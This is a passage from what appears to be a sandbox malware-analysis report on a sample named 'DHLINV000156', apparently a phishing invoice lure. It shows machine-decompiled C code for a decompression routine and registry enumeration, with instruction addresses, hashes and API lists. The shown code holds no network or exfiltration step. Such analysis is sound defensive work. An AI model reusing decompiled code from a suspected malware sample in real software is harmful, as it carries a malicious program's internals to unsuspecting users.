                                        													__eflags =  *_t338;
                                        													goto L102;
                                        												} else {
                                        													goto L99;
                                        												}
                                        											}
                                        											__edx =  *(__ebp - 4);
                                        											__eax = __eax - __ebx;
                                        											 *(__ebp - 0x40) = __ecx;
                                        											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                        											goto L108;
                                        										case 0x1a:
                                        											L56:
                                        											__eflags =  *(__ebp - 0x64);
                                        											if( *(__ebp - 0x64) == 0) {
                                        												 *(__ebp - 0x88) = 0x1a;
                                        												goto L170;
                                        											}
                                        											__ecx =  *(__ebp - 0x68);
                                        											__al =  *(__ebp - 0x5c);
                                        											__edx =  *(__ebp - 8);
                                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                        											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                        											 *( *(__ebp - 0x68)) = __al;
                                        											__ecx =  *(__ebp - 0x14);
                                        											 *(__ecx +  *(__ebp - 8)) = __al;
                                        											__eax = __ecx + 1;
                                        											__edx = 0;
                                        											_t192 = __eax %  *(__ebp - 0x74);
                                        											__eax = __eax /  *(__ebp - 0x74);
                                        											__edx = _t192;
                                        											goto L79;
                                        										case 0x1b:
                                        											L75:
                                        											__eflags =  *(__ebp - 0x64);
                                        											if( *(__ebp - 0x64) == 0) {
                                        												 *(__ebp - 0x88) = 0x1b;
                                        												goto L170;
                                        											}
                                        											__eax =  *(__ebp - 0x14);
                                        											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                        											__eflags = __eax -  *(__ebp - 0x74);
                                        											if(__eax >=  *(__ebp - 0x74)) {
                                        												__eax = __eax +  *(__ebp - 0x74);
                                        												__eflags = __eax;
                                        											}
                                        											__edx =  *(__ebp - 8);
                                        											__cl =  *(__eax + __edx);
                                        											__eax =  *(__ebp - 0x14);
                                        											 *(__ebp - 0x5c) = __cl;
                                        											 *(__eax + __edx) = __cl;
                                        											__eax = __eax + 1;
                                        											__edx = 0;
                                        											_t274 = __eax %  *(__ebp - 0x74);
                                        											__eax = __eax /  *(__ebp - 0x74);
                                        											__edx = _t274;
                                        											__eax =  *(__ebp - 0x68);
                                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                        											_t283 = __ebp - 0x64;
                                        											 *_t283 =  *(__ebp - 0x64) - 1;
                                        											__eflags =  *_t283;
                                        											 *( *(__ebp - 0x68)) = __cl;
                                        											L79:
                                        											 *(__ebp - 0x14) = __edx;
                                        											goto L80;
                                        										case 0x1c:
                                        											while(1) {
                                        												L123:
                                        												__eflags =  *(__ebp - 0x64);
                                        												if( *(__ebp - 0x64) == 0) {
                                        													break;
                                        												}
                                        												__eax =  *(__ebp - 0x14);
                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                        												__eflags = __eax -  *(__ebp - 0x74);
                                        												if(__eax >=  *(__ebp - 0x74)) {
                                        													__eax = __eax +  *(__ebp - 0x74);
                                        													__eflags = __eax;
                                        												}
                                        												__edx =  *(__ebp - 8);
                                        												__cl =  *(__eax + __edx);
                                        												__eax =  *(__ebp - 0x14);
                                        												 *(__ebp - 0x5c) = __cl;
                                        												 *(__eax + __edx) = __cl;
                                        												__eax = __eax + 1;
                                        												__edx = 0;
                                        												_t414 = __eax %  *(__ebp - 0x74);
                                        												__eax = __eax /  *(__ebp - 0x74);
                                        												__edx = _t414;
                                        												__eax =  *(__ebp - 0x68);
                                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                        												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                        												__eflags =  *(__ebp - 0x30);
                                        												 *( *(__ebp - 0x68)) = __cl;
                                        												 *(__ebp - 0x14) = _t414;
                                        												if( *(__ebp - 0x30) > 0) {
                                        													continue;
                                        												} else {
                                        													L80:
                                        													 *(__ebp - 0x88) = 2;
                                        													goto L1;
                                        												}
                                        											}
                                        											 *(__ebp - 0x88) = 0x1c;
                                        											goto L170;
                                        									}
                                        								}
                                        								L171:
                                        								_t535 = _t534 | 0xffffffff;
                                        								goto L172;
                                        							}
                                        						}
                                        					}
                                        				}
                                        			}













                                        0x00000000
                                        0x0040696f
                                        0x0040696f
                                        0x00406973
                                        0x0040699c
                                        0x004069a6
                                        0x00406975
                                        0x0040697e
                                        0x0040698b
                                        0x0040698e
                                        0x00406cd2
                                        0x00406cd2
                                        0x00406cd5
                                        0x00406cd5
                                        0x00406cd5
                                        0x00406cdb
                                        0x00406ce1
                                        0x00406ce7
                                        0x00406d01
                                        0x00406d04
                                        0x00406d0a
                                        0x00406d15
                                        0x00406d17
                                        0x00406ce9
                                        0x00406ce9
                                        0x00406cf8
                                        0x00406cfc
                                        0x00406cfc
                                        0x00406d21
                                        0x00000000
                                        0x00000000
                                        0x00406d23
                                        0x00406d27
                                        0x00406ed6
                                        0x00406eec
                                        0x00406ef4
                                        0x00406efb
                                        0x00406efd
                                        0x00406f04
                                        0x00406f08
                                        0x00406f08
                                        0x00406d33
                                        0x00406d3a
                                        0x00406d42
                                        0x00406d45
                                        0x00406d48
                                        0x00406d48
                                        0x00406d4e
                                        0x00406d4e
                                        0x004064ea
                                        0x004064ea
                                        0x004064ea
                                        0x004064f3
                                        0x00000000
                                        0x00000000
                                        0x004064f9
                                        0x00000000
                                        0x00406504
                                        0x00000000
                                        0x00000000
                                        0x0040650d
                                        0x00406510
                                        0x00406513
                                        0x00406517
                                        0x00000000
                                        0x00000000
                                        0x0040651d
                                        0x00406520
                                        0x00406522
                                        0x00406523
                                        0x00406526
                                        0x00406528
                                        0x00406529
                                        0x0040652b
                                        0x0040652e
                                        0x00406533
                                        0x00406538
                                        0x00406541
                                        0x00406554
                                        0x00406557
                                        0x00406563
                                        0x0040658b
                                        0x0040658d
                                        0x0040659b
                                        0x0040659b
                                        0x0040659f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040658f
                                        0x0040658f
                                        0x00406592
                                        0x00406593
                                        0x00406593
                                        0x00000000
                                        0x0040658f
                                        0x00406569
                                        0x0040656e
                                        0x0040656e
                                        0x00406577
                                        0x0040657f
                                        0x00406582
                                        0x00000000
                                        0x00406588
                                        0x00406588
                                        0x00000000
                                        0x00406588
                                        0x00000000
                                        0x004065a5
                                        0x004065a5
                                        0x004065a9
                                        0x00406e55
                                        0x00000000
                                        0x00406e55
                                        0x004065b2
                                        0x004065c2
                                        0x004065c5
                                        0x004065c8
                                        0x004065c8
                                        0x004065c8
                                        0x004065cb
                                        0x004065cf
                                        0x00000000
                                        0x00000000
                                        0x004065d1
                                        0x004065d7
                                        0x00406601
                                        0x00406607
                                        0x0040660e
                                        0x00000000
                                        0x0040660e
                                        0x004065dd
                                        0x004065e0
                                        0x004065e5
                                        0x004065e5
                                        0x004065f0
                                        0x004065f8
                                        0x004065fb
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406640
                                        0x00406646
                                        0x00406649
                                        0x00406656
                                        0x0040665e
                                        0x00406cd2
                                        0x00000000
                                        0x00000000
                                        0x00406615
                                        0x00406615
                                        0x00406619
                                        0x00406e64
                                        0x00000000
                                        0x00406e64
                                        0x00406625
                                        0x00406630
                                        0x00406630
                                        0x00406630
                                        0x00406633
                                        0x00406636
                                        0x00406639
                                        0x0040663e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406cd5
                                        0x00406cd5
                                        0x00406cdb
                                        0x00406ce1
                                        0x00406ce7
                                        0x00406d01
                                        0x00406d04
                                        0x00406d0a
                                        0x00406d15
                                        0x00406d17
                                        0x00406ce9
                                        0x00406ce9
                                        0x00406cf8
                                        0x00406cfc
                                        0x00406cfc
                                        0x00406d21
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406666
                                        0x00406668
                                        0x0040666b
                                        0x004066dc
                                        0x004066df
                                        0x004066e2
                                        0x004066e9
                                        0x004066f3
                                        0x00406cd2
                                        0x00406cd2
                                        0x00000000
                                        0x00406cd2
                                        0x00406cd2
                                        0x0040666d
                                        0x00406671
                                        0x00406674
                                        0x00406676
                                        0x00406679
                                        0x0040667c
                                        0x0040667e
                                        0x00406681
                                        0x00406683
                                        0x00406688
                                        0x0040668b
                                        0x0040668e
                                        0x00406692
                                        0x00406699
                                        0x0040669c
                                        0x004066a3
                                        0x004066a7
                                        0x004066af
                                        0x004066af
                                        0x004066af
                                        0x004066a9
                                        0x004066a9
                                        0x004066a9
                                        0x0040669e
                                        0x0040669e
                                        0x0040669e
                                        0x004066b3
                                        0x004066b6
                                        0x004066d4
                                        0x004066d6
                                        0x00000000
                                        0x004066b8
                                        0x004066b8
                                        0x004066bb
                                        0x004066be
                                        0x004066c1
                                        0x004066c3
                                        0x004066c3
                                        0x004066c3
                                        0x004066c6
                                        0x004066c9
                                        0x004066cb
                                        0x004066cc
                                        0x004066cf
                                        0x00000000
                                        0x004066cf
                                        0x00000000
                                        0x00406905
                                        0x00406909
                                        0x00406927
                                        0x0040692a
                                        0x00406931
                                        0x00406934
                                        0x00406937
                                        0x0040693a
                                        0x0040693d
                                        0x00406940
                                        0x00406942
                                        0x00406949
                                        0x0040694a
                                        0x0040694c
                                        0x0040694f
                                        0x00406952
                                        0x00406955
                                        0x00406955
                                        0x0040695a
                                        0x00000000
                                        0x0040695a
                                        0x0040690b
                                        0x0040690e
                                        0x00406911
                                        0x0040691b
                                        0x00406cd2
                                        0x00406cd2
                                        0x00000000
                                        0x00406cd2
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004069b2
                                        0x004069b6
                                        0x00000000
                                        0x00000000
                                        0x004069bc
                                        0x004069c0
                                        0x00000000
                                        0x00000000
                                        0x004069c6
                                        0x004069c8
                                        0x004069cc
                                        0x004069cc
                                        0x004069cf
                                        0x004069d3
                                        0x00000000
                                        0x00000000
                                        0x00406a23
                                        0x00406a27
                                        0x00406a2e
                                        0x00406a31
                                        0x00406a34
                                        0x00406a3e
                                        0x00406cd2
                                        0x00406cd2
                                        0x00000000
                                        0x00406cd2
                                        0x00406cd2
                                        0x00406a29
                                        0x00000000
                                        0x00000000
                                        0x00406a4a
                                        0x00406a4e
                                        0x00406a55
                                        0x00406a58
                                        0x00406a5b
                                        0x00406a50
                                        0x00406a50
                                        0x00406a50
                                        0x00406a5e
                                        0x00406a61
                                        0x00406a64
                                        0x00406a64
                                        0x00406a67
                                        0x00406a6a
                                        0x00406a6d
                                        0x00406a6d
                                        0x00406a70
                                        0x00406a77
                                        0x00406a7c
                                        0x00000000
                                        0x00000000
                                        0x00406b0a
                                        0x00406b0a
                                        0x00406b0e
                                        0x00406eac
                                        0x00000000
                                        0x00406eac
                                        0x00406b14
                                        0x00406b17
                                        0x00406b1a
                                        0x00406b1e
                                        0x00406b21
                                        0x00406b27
                                        0x00406b29
                                        0x00406b29
                                        0x00406b29
                                        0x00406b2c
                                        0x00406b2f
                                        0x00000000
                                        0x00000000
                                        0x004066ff
                                        0x004066ff
                                        0x00406703
                                        0x00406e70
                                        0x00000000
                                        0x00406e70
                                        0x00406709
                                        0x0040670c
                                        0x0040670f
                                        0x00406713
                                        0x00406716
                                        0x0040671c
                                        0x0040671e
                                        0x0040671e
                                        0x0040671e
                                        0x00406721
                                        0x00406724
                                        0x00406724
                                        0x00406727
                                        0x0040672a
                                        0x00000000
                                        0x00000000
                                        0x00406730
                                        0x00406736
                                        0x00000000
                                        0x00000000
                                        0x0040673c
                                        0x0040673c
                                        0x00406740
                                        0x00406743
                                        0x00406746
                                        0x00406749
                                        0x0040674c
                                        0x0040674d
                                        0x00406750
                                        0x00406752
                                        0x00406758
                                        0x0040675b
                                        0x0040675e
                                        0x00406761
                                        0x00406764
                                        0x00406767
                                        0x0040676a
                                        0x00406786
                                        0x00406789
                                        0x0040678c
                                        0x0040678f
                                        0x00406796
                                        0x0040679a
                                        0x0040679c
                                        0x004067a0
                                        0x0040676c
                                        0x0040676c
                                        0x00406770
                                        0x00406778
                                        0x0040677d
                                        0x0040677f
                                        0x00406781
                                        0x00406781
                                        0x004067a3
                                        0x004067aa
                                        0x004067ad
                                        0x00000000
                                        0x004067b3
                                        0x00000000
                                        0x004067b3
                                        0x00000000
                                        0x004067b8
                                        0x004067b8
                                        0x004067bc
                                        0x00406e7c
                                        0x00000000
                                        0x00406e7c
                                        0x004067c2
                                        0x004067c5
                                        0x004067c8
                                        0x004067cc
                                        0x004067cf
                                        0x004067d5
                                        0x004067d7
                                        0x004067d7
                                        0x004067d7
                                        0x004067da
                                        0x004067dd
                                        0x004067dd
                                        0x004067dd
                                        0x004067e3
                                        0x00000000
                                        0x00000000
                                        0x004067e5
                                        0x004067e8
                                        0x004067eb
                                        0x004067ee
                                        0x004067f1
                                        0x004067f4
                                        0x004067f7
                                        0x004067fa
                                        0x004067fd
                                        0x00406800
                                        0x00406803
                                        0x0040681b
                                        0x0040681e
                                        0x00406821
                                        0x00406824
                                        0x00406824
                                        0x00406827
                                        0x0040682b
                                        0x0040682d
                                        0x00406805
                                        0x00406805
                                        0x0040680d
                                        0x00406812
                                        0x00406814
                                        0x00406816
                                        0x00406816
                                        0x00406830
                                        0x00406837
                                        0x0040683a
                                        0x00000000
                                        0x0040683c
                                        0x00000000
                                        0x0040683c
                                        0x0040683a
                                        0x00406841
                                        0x00406841
                                        0x00406841
                                        0x00406841
                                        0x00000000
                                        0x00000000
                                        0x0040687c
                                        0x0040687c
                                        0x00406880
                                        0x00406e88
                                        0x00000000
                                        0x00406e88
                                        0x00406886
                                        0x00406889
                                        0x0040688c
                                        0x00406890
                                        0x00406893
                                        0x00406899
                                        0x0040689b
                                        0x0040689b
                                        0x0040689b
                                        0x0040689e
                                        0x004068a1
                                        0x004068a1
                                        0x004068a7
                                        0x00406845
                                        0x00406845
                                        0x00406848
                                        0x00000000
                                        0x00406848
                                        0x004068a9
                                        0x004068a9
                                        0x004068ac
                                        0x004068af
                                        0x004068b2
                                        0x004068b5
                                        0x004068b8
                                        0x004068bb
                                        0x004068be
                                        0x004068c1
                                        0x004068c4
                                        0x004068c7
                                        0x004068df
                                        0x004068e2
                                        0x004068e5
                                        0x004068e8
                                        0x004068e8
                                        0x004068eb
                                        0x004068ef
                                        0x004068f1
                                        0x004068c9
                                        0x004068c9
                                        0x004068d1
                                        0x004068d6
                                        0x004068d8
                                        0x004068da
                                        0x004068da
                                        0x004068f4
                                        0x004068fb
                                        0x004068fe
                                        0x00000000
                                        0x00406900
                                        0x00000000
                                        0x00406900
                                        0x00000000
                                        0x00406b8d
                                        0x00406b8d
                                        0x00406b91
                                        0x00406eb8
                                        0x00000000
                                        0x00406eb8
                                        0x00406b97
                                        0x00406b9a
                                        0x00406b9d
                                        0x00406ba1
                                        0x00406ba4
                                        0x00406baa
                                        0x00406bac
                                        0x00406bac
                                        0x00406bac
                                        0x00406baf
                                        0x00000000
                                        0x00000000
                                        0x0040695d
                                        0x0040695d
                                        0x00406960
                                        0x00406cd2
                                        0x00406cd2
                                        0x00000000
                                        0x00406cd2
                                        0x00000000
                                        0x00406c9c
                                        0x00406ca0
                                        0x00406cc2
                                        0x00406cc5
                                        0x00406ccf
                                        0x00406cd2
                                        0x00406cd2
                                        0x00000000
                                        0x00406cd2
                                        0x00406cd2
                                        0x00406ca2
                                        0x00406ca5
                                        0x00406ca9
                                        0x00406cac
                                        0x00406cac
                                        0x00406caf
                                        0x00000000
                                        0x00000000
                                        0x00406d59
                                        0x00406d5d
                                        0x00406d7b
                                        0x00406d7b
                                        0x00406d7b
                                        0x00406d82
                                        0x00406d89
                                        0x00406d90
                                        0x00406d90
                                        0x00000000
                                        0x00406d90
                                        0x00406d5f
                                        0x00406d62
                                        0x00406d65
                                        0x00406d68
                                        0x00406d6f
                                        0x00406cb3
                                        0x00406cb3
                                        0x00406cb6
                                        0x00000000
                                        0x00000000
                                        0x00406e4a
                                        0x00406e4d
                                        0x00406d4e
                                        0x00000000
                                        0x00000000
                                        0x00406a84
                                        0x00406a86
                                        0x00406a8d
                                        0x00406a8e
                                        0x00406a90
                                        0x00406a93
                                        0x00000000
                                        0x00000000
                                        0x00406a9b
                                        0x00406a9e
                                        0x00406aa1
                                        0x00406aa3
                                        0x00406aa5
                                        0x00406aa5
                                        0x00406aa6
                                        0x00406aa9
                                        0x00406ab0
                                        0x00406ab3
                                        0x00406ac1
                                        0x00000000
                                        0x00000000
                                        0x00406d97
                                        0x00406d97
                                        0x00406d9a
                                        0x00406da1
                                        0x00000000
                                        0x00000000
                                        0x00406da6
                                        0x00406da6
                                        0x00406daa
                                        0x00406ee2
                                        0x00000000
                                        0x00406ee2
                                        0x00406db0
                                        0x00406db3
                                        0x00406db6
                                        0x00406dba
                                        0x00406dbd
                                        0x00406dc3
                                        0x00406dc5
                                        0x00406dc5
                                        0x00406dc5
                                        0x00406dc8
                                        0x00406dcb
                                        0x00406dcb
                                        0x00406dcb
                                        0x00406dcb
                                        0x00406dce
                                        0x00406dce
                                        0x00406dd2
                                        0x00406e32
                                        0x00406e35
                                        0x00406e3a
                                        0x00406e3b
                                        0x00406e3d
                                        0x00406e3f
                                        0x00406e42
                                        0x00406d4e
                                        0x00406d4e
                                        0x00000000
                                        0x00406d54
                                        0x00406d4e
                                        0x00406dd4
                                        0x00406dda
                                        0x00406ddd
                                        0x00406de0
                                        0x00406de3
                                        0x00406de6
                                        0x00406de9
                                        0x00406dec
                                        0x00406def
                                        0x00406df2
                                        0x00406df5
                                        0x00406e0e
                                        0x00406e11
                                        0x00406e14
                                        0x00406e17
                                        0x00406e1b
                                        0x00406e1d
                                        0x00406e1d
                                        0x00406e1e
                                        0x00406e21
                                        0x00406df7
                                        0x00406df7
                                        0x00406dff
                                        0x00406e04
                                        0x00406e06
                                        0x00406e09
                                        0x00406e09
                                        0x00406e24
                                        0x00406e2b
                                        0x00000000
                                        0x00406e2d
                                        0x00000000
                                        0x00406e2d
                                        0x00000000
                                        0x00406ac9
                                        0x00406acc
                                        0x00406b02
                                        0x00406c32
                                        0x00406c32
                                        0x00406c32
                                        0x00406c32
                                        0x00406c35
                                        0x00406c35
                                        0x00406c38
                                        0x00406c3a
                                        0x00406ec4
                                        0x00000000
                                        0x00406ec4
                                        0x00406c40
                                        0x00406c43
                                        0x00000000
                                        0x00000000
                                        0x00406c49
                                        0x00406c4d
                                        0x00406c50
                                        0x00406c50
                                        0x00406c50
                                        0x00000000
                                        0x00406c50
                                        0x00406ace
                                        0x00406ad0
                                        0x00406ad2
                                        0x00406ad4
                                        0x00406ad7
                                        0x00406ad8
                                        0x00406ada
                                        0x00406adc
                                        0x00406adf
                                        0x00406ae2
                                        0x00406af8
                                        0x00406afd
                                        0x00406b35
                                        0x00406b35
                                        0x00406b39
                                        0x00406b65
                                        0x00406b67
                                        0x00406b6e
                                        0x00406b71
                                        0x00406b74
                                        0x00406b74
                                        0x00406b79
                                        0x00406b79
                                        0x00406b7b
                                        0x00406b7e
                                        0x00406b85
                                        0x00406b88
                                        0x00406bb5
                                        0x00406bb5
                                        0x00406bb8
                                        0x00406bbb
                                        0x00406c2f
                                        0x00406c2f
                                        0x00406c2f
                                        0x00000000
                                        0x00406c2f
                                        0x00406bbd
                                        0x00406bc3
                                        0x00406bc6
                                        0x00406bc9
                                        0x00406bcc
                                        0x00406bcf
                                        0x00406bd2
                                        0x00406bd5
                                        0x00406bd8
                                        0x00406bdb
                                        0x00406bde
                                        0x00406bf7
                                        0x00406bf9
                                        0x00406bfc
                                        0x00406bfd
                                        0x00406c00
                                        0x00406c02
                                        0x00406c05
                                        0x00406c07
                                        0x00406c09
                                        0x00406c0c
                                        0x00406c0e
                                        0x00406c11
                                        0x00406c15
                                        0x00406c17
                                        0x00406c17
                                        0x00406c18
                                        0x00406c1b
                                        0x00406c1e
                                        0x00406be0
                                        0x00406be0
                                        0x00406be8
                                        0x00406bed
                                        0x00406bef
                                        0x00406bf2
                                        0x00406bf2
                                        0x00406c21
                                        0x00406c28
                                        0x00406bb2
                                        0x00406bb2
                                        0x00406bb2
                                        0x00406bb2
                                        0x00000000
                                        0x00406c2a
                                        0x00000000
                                        0x00406c2a
                                        0x00406c28
                                        0x00406b3b
                                        0x00406b3e
                                        0x00406b40
                                        0x00406b43
                                        0x00406b46
                                        0x00406b49
                                        0x00406b4b
                                        0x00406b4e
                                        0x00406b51
                                        0x00406b51
                                        0x00406b54
                                        0x00406b54
                                        0x00406b57
                                        0x00406b5e
                                        0x00406b32
                                        0x00406b32
                                        0x00406b32
                                        0x00406b32
                                        0x00000000
                                        0x00406b60
                                        0x00000000
                                        0x00406b60
                                        0x00406b5e
                                        0x00406ae4
                                        0x00406ae7
                                        0x00406ae9
                                        0x00406aec
                                        0x00000000
                                        0x00000000
                                        0x0040684b
                                        0x0040684b
                                        0x0040684f
                                        0x00406e94
                                        0x00000000
                                        0x00406e94
                                        0x00406855
                                        0x00406858
                                        0x0040685b
                                        0x0040685e
                                        0x00406861
                                        0x00406864
                                        0x00406867
                                        0x00406869
                                        0x0040686c
                                        0x0040686f
                                        0x00406872
                                        0x00406874
                                        0x00406874
                                        0x00406874
                                        0x00000000
                                        0x00000000
                                        0x004069d6
                                        0x004069d6
                                        0x004069da
                                        0x00406ea0
                                        0x00000000
                                        0x00406ea0
                                        0x004069e0
                                        0x004069e3
                                        0x004069e6
                                        0x004069e9
                                        0x004069eb
                                        0x004069eb
                                        0x004069eb
                                        0x004069ee
                                        0x004069f1
                                        0x004069f4
                                        0x004069f7
                                        0x004069fa
                                        0x004069fd
                                        0x004069fe
                                        0x00406a00
                                        0x00406a00
                                        0x00406a00
                                        0x00406a03
                                        0x00406a06
                                        0x00406a09
                                        0x00406a0c
                                        0x00406a0c
                                        0x00406a0c
                                        0x00406a0f
                                        0x00406a11
                                        0x00406a11
                                        0x00000000
                                        0x00000000
                                        0x00406c53
                                        0x00406c53
                                        0x00406c53
                                        0x00406c57
                                        0x00000000
                                        0x00000000
                                        0x00406c5d
                                        0x00406c60
                                        0x00406c63
                                        0x00406c66
                                        0x00406c68
                                        0x00406c68
                                        0x00406c68
                                        0x00406c6b
                                        0x00406c6e
                                        0x00406c71
                                        0x00406c74
                                        0x00406c77
                                        0x00406c7a
                                        0x00406c7b
                                        0x00406c7d
                                        0x00406c7d
                                        0x00406c7d
                                        0x00406c80
                                        0x00406c83
                                        0x00406c86
                                        0x00406c89
                                        0x00406c8c
                                        0x00406c90
                                        0x00406c92
                                        0x00406c95
                                        0x00000000
                                        0x00406c97
                                        0x00406a14
                                        0x00406a14
                                        0x00000000
                                        0x00406a14
                                        0x00406c95
                                        0x00406eca
                                        0x00000000
                                        0x00000000
                                        0x004064f9
                                        0x00406f01
                                        0x00406f01
                                        0x00000000
                                        0x00406f01
                                        0x00406d4e
                                        0x00406cd5
                                        0x00406cd2

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 90803f23476dcfb414c0400bb9d8b7cdb0b3ca45f440242c86af8c4d62fdd6e9
                                        • Instruction ID: 34c5161cf4e4322df4c522de15ced9ded486b5ca7425d8c28145854c0c0886a7
                                        • Opcode Fuzzy Hash: 90803f23476dcfb414c0400bb9d8b7cdb0b3ca45f440242c86af8c4d62fdd6e9
                                        • Instruction Fuzzy Hash: 29714571D04229DBEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E0040254C(int* __ebx, intOrPtr __edx, char* __esi) {
                                        				void* _t9;
                                        				int _t10;
                                        				long _t13;
                                        				int* _t16;
                                        				intOrPtr _t21;
                                        				void* _t22;
                                        				char* _t24;
                                        				void* _t26;
                                        				void* _t29;
                                        
                                        				_t24 = __esi;
                                        				_t21 = __edx;
                                        				_t16 = __ebx;
                                        				_t9 = E00402B6C(_t29, 0x20019); // executed
                                        				_t22 = _t9;
                                        				_t10 = E00402B0A(3);
                                        				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
                                        				 *__esi = __ebx;
                                        				if(_t22 == __ebx) {
                                        					 *((intOrPtr*)(_t26 - 4)) = 1;
                                        				} else {
                                        					 *(_t26 + 8) = 0x3ff;
                                        					if( *((intOrPtr*)(_t26 - 0x24)) == __ebx) {
                                        						_t13 = RegEnumValueA(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
                                        						__eflags = _t13;
                                        						if(_t13 != 0) {
                                        							 *((intOrPtr*)(_t26 - 4)) = 1;
                                        						}
                                        					} else {
                                        						RegEnumKeyA(_t22, _t10, __esi, 0x3ff);
                                        					}
                                        					_t24[0x3ff] = _t16;
                                        					_push(_t22);
                                        					RegCloseKey();
                                        				}
                                        				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t26 - 4));
                                        				return 0;
                                        			}












                                        0x0040254c
                                        0x0040254c
                                        0x0040254c
                                        0x00402551
                                        0x00402558
                                        0x0040255a
                                        0x00402562
                                        0x00402565
                                        0x00402567
                                        0x00402783
                                        0x0040256d
                                        0x00402575
                                        0x00402578
                                        0x00402591
                                        0x00402597
                                        0x00402599
                                        0x0040259b
                                        0x0040259b
                                        0x0040257a
                                        0x0040257e
                                        0x0040257e
                                        0x004025a2
                                        0x004025a8
                                        0x004025a9
                                        0x004025a9
                                        0x004029bb
                                        0x004029c7

                                        APIs
                                        • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040257E
                                        • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 00402591
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsf4536.tmp,00000000,00000011,00000002), ref: 004025A9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Enum$CloseValue
                                        • String ID:
                                        • API String ID: 397863658-0
                                        • Opcode ID: 095019f322b6c40d92cef5b4465a19737fb82d48870a7b4a86778a7d8ee6d3d7
                                        • Instruction ID: 35fd857a3e442691b1a787247be78dd7b49a46040516f967143c2ea575d22cfd
                                        • Opcode Fuzzy Hash: 095019f322b6c40d92cef5b4465a19737fb82d48870a7b4a86778a7d8ee6d3d7
                                        • Instruction Fuzzy Hash: 5801B1B1905204FFE7119F659E89ABF7ABCEB40344F10443EF402B62C0D6B85E019669
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 59%
                                        			E00401389(signed int _a4) {
                                        				intOrPtr* _t6;
                                        				void* _t8;
                                        				void* _t10;
                                        				signed int _t11;
                                        				void* _t12;
                                        				signed int _t16;
                                        				signed int _t17;
                                        				void* _t18;
                                        
                                        				_t17 = _a4;
                                        				while(_t17 >= 0) {
                                        					_t6 = _t17 * 0x1c +  *0x423750;
                                        					if( *_t6 == 1) {
                                        						break;
                                        					}
                                        					_push(_t6); // executed
                                        					_t8 = E00401434(); // executed
                                        					if(_t8 == 0x7fffffff) {
                                        						return 0x7fffffff;
                                        					}
